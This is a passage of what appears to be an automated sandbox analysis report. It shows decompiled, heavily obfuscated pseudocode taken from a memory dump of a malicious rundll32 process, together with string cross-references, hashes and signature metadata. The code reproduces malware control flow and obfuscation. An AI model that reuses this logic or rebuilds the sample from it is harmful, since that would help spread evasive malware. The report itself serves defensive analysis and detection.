				_v68 = _v68 ^ 0x00082e42;
				_v128 = 0x7916;
				_v128 = _v128 + 0x2b05;
				_v128 = _v128 ^ 0xe1998e72;
				_v128 = _v128 ^ 0xe1992c62;
				_v120 = 0xe946;
				_v120 = _v120 + 0xbb27;
				_v120 = _v120 << 1;
				_v120 = _v120 ^ 0x0003041a;
				_v136 = 0xb1ad;
				_t428 = 0x2f;
				_v136 = _v136 * 0x2c;
				_v136 = _v136 / _t428;
				_v136 = _v136 ^ 0x0000fb6b;
				_v116 = 0xdc58;
				_v116 = _v116 | 0xd4c8ac44;
				_v116 = _v116 << 7;
				_v116 = _v116 ^ 0x647e7301;
				_v72 = 0xb8af;
				_v72 = _v72 * 0x45;
				_v72 = _v72 ^ 0x00319874;
				_v164 = 0xa3;
				_v164 = _v164 + 0xffff67c9;
				_v164 = _v164 | 0xe199b05b;
				_v164 = _v164 + 0xffff81e1;
				_v164 = _v164 ^ 0xffff3813;
				_v64 = 0xc10a;
				_v64 = _v64 | 0x41072eb0;
				_v64 = _v64 ^ 0x4107edf9;
				_v92 = 0xba30;
				_v92 = _v92 | 0x6049f892;
				_v92 = _v92 ^ 0x60499e7e;
				_v176 = 0x47c3;
				_v176 = _v176 >> 3;
				_v176 = _v176 ^ 0x8f8a29cf;
				_v176 = _v176 << 0xb;
				_v176 = _v176 ^ 0x5109efc4;
				_v148 = 0xda1;
				_t429 = 0x4c;
				_v148 = _v148 * 0x57;
				_v148 = _v148 + 0xa496;
				_v148 = _v148 / _t429;
				_v148 = _v148 ^ 0x00002f39;
				_v108 = 0xdb7a;
				_v108 = _v108 + 0xf4b0;
				_v108 = _v108 * 0x68;
				_v108 = _v108 ^ 0x00bca527;
				_v156 = 0xff6c;
				_v156 = _v156 ^ 0xee25b214;
				_v156 = _v156 >> 0xa;
				_v156 = _v156 + 0x8d5b;
				_v156 = _v156 ^ 0x003c282f;
				goto L1;
				do {
					while(1) {
						L1:
						_t438 = _t372 - 0x2a7fbf86;
						if(_t438 > 0) {
							break;
						}
						if(_t438 == 0) {
							E002931A5( *((intOrPtr*)(_t431 + 0x10)), _v100, _v144,  &_v60, _v68);
							_t435 =  &(_t435[3]);
							_t372 = 0x13daeaf7;
							continue;
						} else {
							if(_t372 == 0x1aec3e5) {
								_t370[1] = E00295D0E(_t431);
								_t372 = 0x39a008cf;
								continue;
							} else {
								if(_t372 == 0x6ac97f0) {
									E002931A5( *((intOrPtr*)(_t431 + 0xc)), _v152, _v168,  &_v60, _v160);
									_t435 =  &(_t435[3]);
									_t372 = 0x2a7fbf86;
									continue;
								} else {
									if(_t372 == 0xf58ea71) {
										E002931A5( *((intOrPtr*)(_t431 + 8)), _v84, _v140,  &_v60, _v112);
										_t435 =  &(_t435[3]);
										_t372 = 0x6ac97f0;
										continue;
									} else {
										if(_t372 == 0x13daeaf7) {
											E002931A5( *((intOrPtr*)(_t431 + 0x14)), _v128, _v120,  &_v60, _v136);
											_t435 =  &(_t435[3]);
											_t372 = 0x309687df;
											continue;
										} else {
											if(_t372 == 0x181c43c1) {
												E002A5677(_v64, _v92, __eflags, _t431 + 0x20,  &_v60, _v176);
												_t435 =  &(_t435[3]);
												_t372 = 0x33dbaae4;
												continue;
											} else {
												_t444 = _t372 - 0x2411e5be;
												if(_t372 != 0x2411e5be) {
													goto L26;
												} else {
													E002A5677(_v132, _v104, _t444, _t431,  &_v60, _v76);
													_t435 =  &(_t435[3]);
													_t372 = 0xf58ea71;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L29:
						__eflags =  *_t370;
						_t310 =  *_t370 != 0;
						__eflags = _t310;
						return 0 | _t310;
					}
					__eflags = _t372 - 0x309687df;
					if(__eflags == 0) {
						E002A5677(_v116, _v72, __eflags, _t431 + 0x18,  &_v60, _v164);
						_t435 =  &(_t435[3]);
						_t372 = 0x181c43c1;
						goto L26;
					} else {
						__eflags = _t372 - 0x33dbaae4;
						if(_t372 == 0x33dbaae4) {
							_t304 =  &_v156; // 0x3c282f
							E002931A5( *((intOrPtr*)(_t431 + 0x28)), _v148, _v108,  &_v60,  *_t304);
						} else {
							__eflags = _t372 - 0x37961ba0;
							if(__eflags == 0) {
								 *_t370 = 0;
								_t372 = 0x1aec3e5;
								_t370[1] = 0;
								goto L1;
							} else {
								__eflags = _t372 - 0x39a008cf;
								if(_t372 == 0x39a008cf) {
									_push(_t372);
									_push(_t372);
									_t368 = E002A9E2B(_t370[1]);
									_t435 =  &(_t435[3]);
									 *_t370 = _t368;
									__eflags = _t368;
									if(__eflags != 0) {
										_t372 = 0x39d55f5a;
										goto L1;
									}
								} else {
									__eflags = _t372 - 0x39d55f5a;
									if(_t372 != 0x39d55f5a) {
										goto L26;
									} else {
										E002ACF95(_v96,  &_v60, _t370, _v180);
										_t372 = 0x2411e5be;
										goto L1;
									}
								}
							}
						}
					}
					goto L29;
					L26:
					__eflags = _t372 - 0x33970593;
				} while (__eflags != 0);
				goto L29;
			}

0x0029ffbe
0x0029ffc5
0x0029ffc8
0x0029ffcf
0x0029ffd0
0x0029ffd7
0x0029ffd8
0x0029ffd9
0x0029ffde
0x0029fff2
0x0029fff5
0x0029fff8
0x0029ffff
0x002a0000
0x002a0001
0x002a0009
0x002a000e
0x002a001a
0x002a001f
0x002a0025
0x002a002d
0x002a0039
0x002a003e
0x002a0044
0x002a004c
0x002a0058
0x002a005d
0x002a0063
0x002a006b
0x002a0073
0x002a007b
0x002a0083
0x002a008b
0x002a0093
0x002a0098
0x002a00a0
0x002a00a8
0x002a00b4
0x002a00b9
0x002a00c3
0x002a00c8
0x002a00ce
0x002a00d6
0x002a00de
0x002a00e7
0x002a00ec
0x002a00f0
0x002a00fa
0x002a0106
0x002a010b
0x002a010f
0x002a0117
0x002a011f
0x002a0127
0x002a012f
0x002a0137
0x002a013f
0x002a0147
0x002a014f
0x002a0157
0x002a015f
0x002a0167
0x002a016f
0x002a0177
0x002a017f
0x002a0187
0x002a0195
0x002a019a
0x002a019e
0x002a01a6
0x002a01ab
0x002a01b3
0x002a01bb
0x002a01c7
0x002a01ca
0x002a01ce
0x002a01d6
0x002a01de
0x002a01e6
0x002a01f3
0x002a01f7
0x002a01fb
0x002a0203
0x002a020b
0x002a0210
0x002a0218
0x002a0220
0x002a022d
0x002a0231
0x002a0239
0x002a0244
0x002a024c
0x002a0257
0x002a025f
0x002a0267
0x002a026f
0x002a0277
0x002a027f
0x002a0287
0x002a028b
0x002a0293
0x002a02a0
0x002a02a1
0x002a02ab
0x002a02af
0x002a02b7
0x002a02bf
0x002a02c7
0x002a02cc
0x002a02d4
0x002a02e1
0x002a02e7
0x002a02f4
0x002a02fc
0x002a0304
0x002a030c
0x002a0314
0x002a031c
0x002a0327
0x002a0332
0x002a033d
0x002a0345
0x002a034d
0x002a0355
0x002a035d
0x002a0362
0x002a036a
0x002a036f
0x002a0377
0x002a0386
0x002a0387
0x002a038b
0x002a0399
0x002a039d
0x002a03a5
0x002a03ad
0x002a03ba
0x002a03be
0x002a03c6
0x002a03ce
0x002a03d6
0x002a03db
0x002a03e3
0x002a03eb
0x002a03ed
0x002a03ed
0x002a03ed
0x002a03ed
0x002a03ef
0x00000000
0x00000000
0x002a03f5
0x002a0532
0x002a0537
0x002a053a
0x00000000
0x002a03fb
0x002a0401
0x002a050b
0x002a050e
0x00000000
0x002a0407
0x002a040d
0x002a04f5
0x002a04fa
0x002a04fd
0x00000000
0x002a0413
0x002a0419
0x002a04cc
0x002a04d1
0x002a04d4
0x00000000
0x002a041f
0x002a0425
0x002a04a3
0x002a04a8
0x002a04ab
0x00000000
0x002a0427
0x002a042d
0x002a047a
0x002a047f
0x002a0482
0x00000000
0x002a042f
0x002a042f
0x002a0435
0x00000000
0x002a043b
0x002a0450
0x002a0455
0x002a0458
0x00000000
0x002a0458
0x002a0435
0x002a042d
0x002a0425
0x002a0419
0x002a040d
0x002a0401
0x002a062a
0x002a062c
0x002a0631
0x002a0631
0x002a063b
0x002a063b
0x002a0544
0x002a054a
0x002a05f0
0x002a05f5
0x002a05f8
0x00000000
0x002a0550
0x002a0550
0x002a0556
0x002a060b
0x002a0622
0x002a055c
0x002a055c
0x002a0562
0x002a05c6
0x002a05c8
0x002a05cd
0x00000000
0x002a0564
0x002a0564
0x002a056a
0x002a05a9
0x002a05aa
0x002a05ae
0x002a05b3
0x002a05b6
0x002a05b8
0x002a05ba
0x002a05bc
0x00000000
0x002a05bc
0x002a056c
0x002a056c
0x002a0572
0x00000000
0x002a0578
0x002a0588
0x002a058f
0x00000000
0x002a058f
0x002a0572
0x002a056a
0x002a0562
0x002a0556
0x00000000
0x002a05fd
0x002a05fd
0x002a05fd
0x00000000

Strings

_Zj, xrefs: 0029FFDE
T, xrefs: 002A008B
/(<, xrefs: 002A060B
nRO, xrefs: 002A017F
9/, xrefs: 002A039D
F, xrefs: 002A0277

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /(<$9/$F$_Zj$nRO$T
API String ID: 0-1423594312
Opcode ID: aa8ef10a9c8848ab96f7e0eaf023ba195d0dd373044313e13f5cf732eec6a747
Instruction ID: 5b444691b9641fc2b660f2188f479b148ad643bb3c84e5da3b3dc868164c21d5
Opcode Fuzzy Hash: aa8ef10a9c8848ab96f7e0eaf023ba195d0dd373044313e13f5cf732eec6a747
Instruction Fuzzy Hash: 4DF155715083818FE764CF25C485A1FFBE1BBC4758F108A2EF196862A0DBB99959CF03

Uniqueness

Uniqueness Score: -1.00%

Function 0029B3A2, Relevance: 7.7, Strings: 6, Instructions: 240
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0029B3A2() {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				unsigned int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t251;
				intOrPtr* _t252;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				void* _t279;
				void* _t305;
				void* _t308;
				signed int* _t309;

				_t309 =  &_v104;
				_v8 = 0x110da;
				_v4 = 0;
				_v92 = 0x7412;
				_v92 = _v92 << 2;
				_v92 = _v92 + 0xffffe1bd;
				_v12 = 0;
				_t305 = 0x21f3d08f;
				_t262 = 0x1a;
				_v92 = _v92 / _t262;
				_v92 = _v92 ^ 0x800010b0;
				_v96 = 0x902b;
				_v96 = _v96 >> 9;
				_v96 = _v96 >> 0xb;
				_v96 = _v96 ^ 0x6eb2714a;
				_v96 = _v96 ^ 0x6eb27148;
				_v44 = 0x3f49;
				_v44 = _v44 << 5;
				_v44 = _v44 ^ 0x00079abe;
				_v64 = 0xcee2;
				_v64 = _v64 ^ 0x1134a44f;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x268d4c68;
				_v104 = 0x3a79;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x598426cd;
				_v104 = _v104 + 0x6d2b;
				_v104 = _v104 ^ 0x598487be;
				_v56 = 0x10a8;
				_v56 = _v56 << 0x10;
				_t263 = 0x32;
				_v56 = _v56 / _t263;
				_v56 = _v56 ^ 0x00554197;
				_v80 = 0x5546;
				_v80 = _v80 ^ 0x3248a4d8;
				_t264 = 0x3f;
				_v80 = _v80 / _t264;
				_v80 = _v80 >> 0xe;
				_v80 = _v80 ^ 0x00003999;
				_v84 = 0x2821;
				_v84 = _v84 + 0xfef;
				_t265 = 0x77;
				_v84 = _v84 / _t265;
				_v84 = _v84 + 0xffff39cb;
				_v84 = _v84 ^ 0xffff4958;
				_v88 = 0x1008;
				_v88 = _v88 ^ 0x19f094d7;
				_v88 = _v88 >> 3;
				_v88 = _v88 << 5;
				_v88 = _v88 ^ 0x67c2172a;
				_v60 = 0x14b4;
				_t266 = 0x34;
				_v60 = _v60 / _t266;
				_v60 = _v60 + 0xdda;
				_v60 = _v60 ^ 0x00007165;
				_v36 = 0x491d;
				_v36 = _v36 ^ 0x07ce430d;
				_v36 = _v36 ^ 0x07ce52e2;
				_v100 = 0x2dab;
				_v100 = _v100 + 0xbcc6;
				_v100 = _v100 | 0xfd0e25fa;
				_v100 = _v100 ^ 0x1c83b092;
				_v100 = _v100 ^ 0xe18d7181;
				_v40 = 0xc87d;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0x00000f4d;
				_v76 = 0x9ebd;
				_v76 = _v76 + 0xffff7a71;
				_v76 = _v76 >> 5;
				_v76 = _v76 | 0x51d85a0f;
				_v76 = _v76 ^ 0x51d87494;
				_v48 = 0x72d3;
				_v48 = _v48 + 0xffff14a1;
				_v48 = _v48 + 0xffff27ed;
				_v48 = _v48 ^ 0xfffee94e;
				_v52 = 0xbe7e;
				_t267 = 0x1b;
				_v52 = _v52 / _t267;
				_t268 = 0x50;
				_v52 = _v52 / _t268;
				_v52 = _v52 ^ 0x00004ff8;
				_v24 = 0x9a6;
				_t269 = 0xd;
				_v24 = _v24 / _t269;
				_v24 = _v24 ^ 0x00000dbc;
				_v28 = 0xc55e;
				_v28 = _v28 ^ 0xc1d10a24;
				_v28 = _v28 ^ 0xc1d1f779;
				_v32 = 0x2879;
				_t270 = 0x53;
				_t260 = _v12;
				_t308 = 0x5c;
				_v32 = _v32 * 0x2d;
				_v32 = _v32 ^ 0x000779d7;
				_v20 = 0x9335;
				_v20 = _v20 >> 9;
				_v20 = _v20 ^ 0x00000d0d;
				_v68 = 0x7b7f;
				_v68 = _v68 + 0x5285;
				_v68 = _v68 + 0x8909;
				_v68 = _v68 * 0x6d;
				_v68 = _v68 ^ 0x00924d65;
				_v72 = 0x86e2;
				_v72 = _v72 + 0xffff86e1;
				_v72 = _v72 << 0xb;
				_v72 = _v72 / _t270;
				_v72 = _v72 ^ 0x000102c8;
				while(1) {
					L1:
					_t251 = 0x20b5600c;
					do {
						while(_t305 != 0x10dff542) {
							if(_t305 == _t251) {
								_t252 = E002987A5(_v16, _v24, _t260, _v28, _v32);
								_t309 =  &(_t309[3]);
								__eflags = _t252;
								_t305 = 0x31834b6a;
								_v12 = 0 | __eflags == 0x00000000;
								goto L1;
							}
							if(_t305 == 0x21f3d08f) {
								_t305 = 0x10dff542;
								continue;
							}
							if(_t305 == 0x31834b6a) {
								E002931C8(_v20, _v16, _v72);
								L17:
								return _v12;
							}
							_t315 = _t305 - 0x33c728fa;
							if(_t305 == 0x33c728fa) {
								_push(_v104);
								_push(_v64);
								_t255 = E00296ABA(_v44, 0x2af7b0, _t315);
								_pop(_t279);
								E002A8085(_v56, _t279, _v84, _t279, _v88, _v60, _t279, _t255, _v92, _t279, _t279, _v36, _v96, _v100,  &_v16, _v40);
								_t305 =  ==  ? 0x20b5600c : 0x2baeeb18;
								E0029F935(_v76, _t255, _v48, _v52);
								_t309 =  &(_t309[0x11]);
								_t251 = 0x20b5600c;
							}
							goto L14;
						}
						_t261 =  *0x2b0724; // 0x340cf0
						while(1) {
							__eflags =  *_t261 - _t308;
							if( *_t261 == _t308) {
								break;
							}
							_t261 = _t261 + 2;
							__eflags = _t261;
						}
						_t260 = _t261 + 2;
						__eflags = _t261 + 2;
						_t305 = 0x33c728fa;
						L14:
					} while (_t305 != 0x2baeeb18);
					goto L17;
				}
			}

0x0029b3a2
0x0029b3a5
0x0029b3af
0x0029b3b5
0x0029b3bd
0x0029b3c2
0x0029b3ce
0x0029b3d2
0x0029b3dd
0x0029b3e2
0x0029b3e8
0x0029b3f0
0x0029b3f8
0x0029b3fd
0x0029b402
0x0029b40a
0x0029b412
0x0029b41a
0x0029b41f
0x0029b427
0x0029b42f
0x0029b437
0x0029b43c
0x0029b444
0x0029b44c
0x0029b451
0x0029b459
0x0029b461
0x0029b469
0x0029b471
0x0029b47a
0x0029b47f
0x0029b485
0x0029b48d
0x0029b495
0x0029b4a1
0x0029b4a6
0x0029b4ac
0x0029b4b1
0x0029b4b9
0x0029b4c1
0x0029b4cd
0x0029b4d2
0x0029b4d8
0x0029b4e0
0x0029b4e8
0x0029b4f0
0x0029b4f8
0x0029b4fd
0x0029b502
0x0029b50a
0x0029b516
0x0029b519
0x0029b51d
0x0029b525
0x0029b52d
0x0029b535
0x0029b53d
0x0029b547
0x0029b54f
0x0029b557
0x0029b55f
0x0029b567
0x0029b56f
0x0029b577
0x0029b57c
0x0029b584
0x0029b58c
0x0029b594
0x0029b599
0x0029b5a1
0x0029b5a9
0x0029b5b1
0x0029b5b9
0x0029b5c1
0x0029b5c9
0x0029b5d7
0x0029b5dc
0x0029b5e6
0x0029b5eb
0x0029b5f1
0x0029b5f9
0x0029b605
0x0029b60a
0x0029b610
0x0029b618
0x0029b620
0x0029b628
0x0029b630
0x0029b63d
0x0029b63e
0x0029b644
0x0029b645
0x0029b649
0x0029b651
0x0029b659
0x0029b65e
0x0029b666
0x0029b66e
0x0029b676
0x0029b683
0x0029b687
0x0029b68f
0x0029b697
0x0029b69f
0x0029b6aa
0x0029b6ae
0x0029b6b6
0x0029b6b6
0x0029b6b6
0x0029b6bb
0x0029b6bb
0x0029b6c9
0x0029b792
0x0029b799
0x0029b79c
0x0029b79e
0x0029b7a6
0x00000000
0x0029b7a6
0x0029b6d5
0x0029b777
0x00000000
0x0029b777
0x0029b6e1
0x0029b7e5
0x0029b7ec
0x0029b7f7
0x0029b7f7
0x0029b6e7
0x0029b6ed
0x0029b6f3
0x0029b6fc
0x0029b704
0x0029b70a
0x0029b740
0x0029b765
0x0029b768
0x0029b76d
0x0029b770
0x0029b770
0x00000000
0x0029b6ed
0x0029b7af
0x0029b7ba
0x0029b7ba
0x0029b7bd
0x00000000
0x00000000
0x0029b7b7
0x0029b7b7
0x0029b7b7
0x0029b7bf
0x0029b7bf
0x0029b7c2
0x0029b7c7
0x0029b7c7
0x00000000
0x0029b7d3

Strings

+m, xrefs: 0029B459
!(, xrefs: 0029B4B9
FU, xrefs: 0029B48D
I?, xrefs: 0029B412
eq, xrefs: 0029B525
y(, xrefs: 0029B630

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !($+m$FU$I?$eq$y(
API String ID: 0-3935245238
Opcode ID: f50562b2a6bbd9b14081e3075f5df4a1c18110271f564812e98610d487b6755a
Instruction ID: c239585b92ed7e1ab5683de89dd0ac3f915ca62c6c466806a513955254a398ba
Opcode Fuzzy Hash: f50562b2a6bbd9b14081e3075f5df4a1c18110271f564812e98610d487b6755a
Instruction Fuzzy Hash: A7B130725083409FE758CF65D98A50BFBE2BBC4B58F108A1DF199862A0D7B5D919CF02

Uniqueness

Uniqueness Score: -1.00%

Function 0029F471, Relevance: 7.7, Strings: 6, Instructions: 211
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E0029F471() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				unsigned int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				void* _t225;
				void* _t228;
				intOrPtr _t231;
				void* _t237;
				intOrPtr _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int* _t269;

				_t269 =  &_v1148;
				_v1056 = 0x70a491;
				_v1052 = 0x4abc55;
				_t237 = 0x1a747ee1;
				_v1048 = 0;
				_t260 = 0;
				_v1044 = 0;
				_v1144 = 0xa81;
				_v1144 = _v1144 + 0xffffc1d5;
				_t261 = 0x1a;
				_v1144 = _v1144 / _t261;
				_v1144 = _v1144 + 0xb8f;
				_v1144 = _v1144 ^ 0x09d8a735;
				_v1088 = 0x84c8;
				_v1088 = _v1088 >> 7;
				_v1088 = _v1088 ^ 0x00004836;
				_v1124 = 0xc680;
				_t262 = 0x71;
				_v1124 = _v1124 / _t262;
				_v1124 = _v1124 ^ 0x0accb399;
				_v1124 = _v1124 ^ 0x0acc914d;
				_v1112 = 0x3108;
				_v1112 = _v1112 >> 7;
				_v1112 = _v1112 << 5;
				_v1112 = _v1112 ^ 0x000064d0;
				_v1068 = 0xa3e7;
				_v1068 = _v1068 | 0x6ea4e7cb;
				_v1068 = _v1068 ^ 0x6ea4b0c4;
				_v1064 = 0xa962;
				_v1064 = _v1064 ^ 0xad3ff7a4;
				_v1064 = _v1064 ^ 0xad3f3e12;
				_v1116 = 0xab42;
				_v1116 = _v1116 | 0xf7ff47df;
				_v1116 = _v1116 ^ 0xf7ffff11;
				_v1104 = 0xd9a1;
				_v1104 = _v1104 << 0xc;
				_v1104 = _v1104 | 0x0a603aef;
				_v1104 = _v1104 ^ 0x0ffa70e5;
				_v1060 = 0x8050;
				_v1060 = _v1060 << 7;
				_v1060 = _v1060 ^ 0x00402cc2;
				_v1132 = 0xd967;
				_v1132 = _v1132 | 0xf0af7977;
				_v1132 = _v1132 + 0x35d3;
				_t263 = 0x29;
				_v1132 = _v1132 / _t263;
				_v1132 = _v1132 ^ 0x05deb9b0;
				_v1120 = 0xf57c;
				_t264 = 0x19;
				_v1120 = _v1120 / _t264;
				_v1120 = _v1120 << 0xa;
				_v1120 = _v1120 ^ 0x00271bed;
				_v1092 = 0xf273;
				_t265 = 0x69;
				_v1092 = _v1092 / _t265;
				_v1092 = _v1092 ^ 0x00006287;
				_v1084 = 0x94c;
				_v1084 = _v1084 ^ 0x5b799d55;
				_v1084 = _v1084 ^ 0x5b798d3c;
				_v1108 = 0x37ad;
				_v1108 = _v1108 + 0xffff498d;
				_v1108 = _v1108 ^ 0xef6f1160;
				_v1108 = _v1108 ^ 0x109092f4;
				_v1100 = 0xbc0d;
				_v1100 = _v1100 >> 8;
				_v1100 = _v1100 + 0xffffbe6f;
				_v1100 = _v1100 ^ 0xffff85f2;
				_v1148 = 0x902b;
				_v1148 = _v1148 + 0xffffa17f;
				_t266 = 0x62;
				_v1148 = _v1148 * 0x73;
				_v1148 = _v1148 << 5;
				_v1148 = _v1148 ^ 0x02c99f9b;
				_v1140 = 0xff08;
				_v1140 = _v1140 << 0xe;
				_v1140 = _v1140 << 9;
				_v1140 = _v1140 << 0xb;
				_v1140 = _v1140 ^ 0x00006101;
				_v1076 = 0xbf8f;
				_v1076 = _v1076 | 0x9f7df67d;
				_v1076 = _v1076 ^ 0x9f7d960a;
				_v1072 = 0xe803;
				_v1072 = _v1072 + 0xffff955b;
				_v1072 = _v1072 ^ 0x000024d1;
				_v1096 = 0x1537;
				_v1096 = _v1096 * 0x25;
				_v1096 = _v1096 + 0x3032;
				_v1096 = _v1096 ^ 0x000363ff;
				_v1080 = 0x66ed;
				_v1080 = _v1080 / _t266;
				_v1080 = _v1080 ^ 0x00006583;
				_v1128 = 0x7ae6;
				_v1128 = _v1128 * 0x5b;
				_v1128 = _v1128 >> 5;
				_v1128 = _v1128 + 0xf381;
				_v1128 = _v1128 ^ 0x00024350;
				_v1136 = 0x6e96;
				_v1136 = _v1136 >> 3;
				_v1136 = _v1136 | 0xd855eb0f;
				_v1136 = _v1136 >> 7;
				_v1136 = _v1136 ^ 0x01b0fce9;
				do {
					while(_t237 != 0x16cb5593) {
						if(_t237 == 0x1a747ee1) {
							_push(_t237);
							E002A29A0(_v1124, _v1112, _v1068,  &_v1040, _v1064, _t237, _v1144);
							_t269 =  &(_t269[8]);
							_t237 = 0x356a7c34;
							continue;
						} else {
							_t273 = _t237 - 0x356a7c34;
							if(_t237 == 0x356a7c34) {
								_push(_v1060);
								_push(_v1104);
								_t228 = E00296ABA(_v1116, 0x2af820, _t273);
								_t231 =  *0x2b0724; // 0x340cf0
								E0029EF2E(_t228, _t273, _v1120, _v1092, _t231 + 0x238, _v1084, 0x104,  &_v520, _v1108,  &_v1040,  *0x2b0724, _v1100);
								E0029F935(_v1148, _t228, _v1140, _v1076);
								_t269 =  &(_t269[0xe]);
								_t237 = 0x16cb5593;
								continue;
							}
						}
						goto L7;
					}
					_push(_v1136);
					_push(_v1128);
					_push(0);
					_push(_v1080);
					_push( &_v520);
					_push(_v1096);
					_push(0);
					_push(0);
					_t225 = E002A4DAD(_v1072, __eflags);
					_t269 =  &(_t269[8]);
					__eflags = _t225;
					_t260 =  !=  ? 1 : _t260;
					_t237 = 0x3b6017a;
					L7:
					__eflags = _t237 - 0x3b6017a;
				} while (__eflags != 0);
				return _t260;
			}

0x0029f471
0x0029f477
0x0029f481
0x0029f489
0x0029f494
0x0029f498
0x0029f49a
0x0029f49e
0x0029f4a6
0x0029f4b4
0x0029f4b9
0x0029f4bf
0x0029f4c7
0x0029f4cf
0x0029f4d7
0x0029f4dc
0x0029f4e4
0x0029f4f0
0x0029f4f5
0x0029f4fb
0x0029f503
0x0029f50b
0x0029f513
0x0029f518
0x0029f51d
0x0029f525
0x0029f52d
0x0029f535
0x0029f53d
0x0029f545
0x0029f54d
0x0029f555
0x0029f55d
0x0029f565
0x0029f56d
0x0029f575
0x0029f57a
0x0029f582
0x0029f58a
0x0029f592
0x0029f597
0x0029f59f
0x0029f5a7
0x0029f5af
0x0029f5bb
0x0029f5c0
0x0029f5c6
0x0029f5ce
0x0029f5da
0x0029f5df
0x0029f5e5
0x0029f5ea
0x0029f5f2
0x0029f5fe
0x0029f601
0x0029f605
0x0029f60d
0x0029f615
0x0029f61f
0x0029f62c
0x0029f634
0x0029f63c
0x0029f644
0x0029f64c
0x0029f654
0x0029f659
0x0029f661
0x0029f669
0x0029f671
0x0029f680
0x0029f681
0x0029f685
0x0029f68a
0x0029f692
0x0029f69a
0x0029f69f
0x0029f6a4
0x0029f6a9
0x0029f6b1
0x0029f6b9
0x0029f6c1
0x0029f6c9
0x0029f6d1
0x0029f6d9
0x0029f6e1
0x0029f6ee
0x0029f6f2
0x0029f6fa
0x0029f702
0x0029f710
0x0029f714
0x0029f71c
0x0029f729
0x0029f72d
0x0029f732
0x0029f73a
0x0029f742
0x0029f74a
0x0029f74f
0x0029f757
0x0029f75c
0x0029f764
0x0029f764
0x0029f776
0x0029f804
0x0029f826
0x0029f82b
0x0029f82e
0x00000000
0x0029f77c
0x0029f77c
0x0029f77e
0x0029f784
0x0029f78d
0x0029f795
0x0029f7c5
0x0029f7dc
0x0029f7f2
0x0029f7f7
0x0029f7fa
0x00000000
0x0029f7fa
0x0029f77e
0x00000000
0x0029f776
0x0029f835
0x0029f840
0x0029f844
0x0029f845
0x0029f849
0x0029f84a
0x0029f852
0x0029f853
0x0029f854
0x0029f85b
0x0029f85f
0x0029f861
0x0029f864
0x0029f869
0x0029f869
0x0029f869
0x0029f881

Strings

L, xrefs: 0029F60D
:`, xrefs: 0029F57A
z, xrefs: 0029F71C
4|j5, xrefs: 0029F627
f, xrefs: 0029F702
20, xrefs: 0029F6F2

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 20$4|j5$L$:`$f$z
API String ID: 0-2384695267
Opcode ID: 0eb94f54607097dc300adf5409589bd55b0361d4749dde391972f99a1eb8db89
Instruction ID: f91b3d957cc3dd8f23fed14d9fd4fa502d668ab82a489e4258d398f701a5cbf6
Opcode Fuzzy Hash: 0eb94f54607097dc300adf5409589bd55b0361d4749dde391972f99a1eb8db89
Instruction Fuzzy Hash: 11A130B15083819FE794CF65C98945BFBF1FBC4758F108A2CF19686260C7B68A59CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00295D0E, Relevance: 7.7, Strings: 6, Instructions: 196
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00295D0E(void* __ecx) {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t161;
				void* _t162;
				void* _t165;
				void* _t168;
				void* _t173;
				void* _t176;
				void* _t177;
				void* _t178;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				void* _t184;
				void* _t199;
				void* _t200;
				signed int* _t202;
				void* _t205;

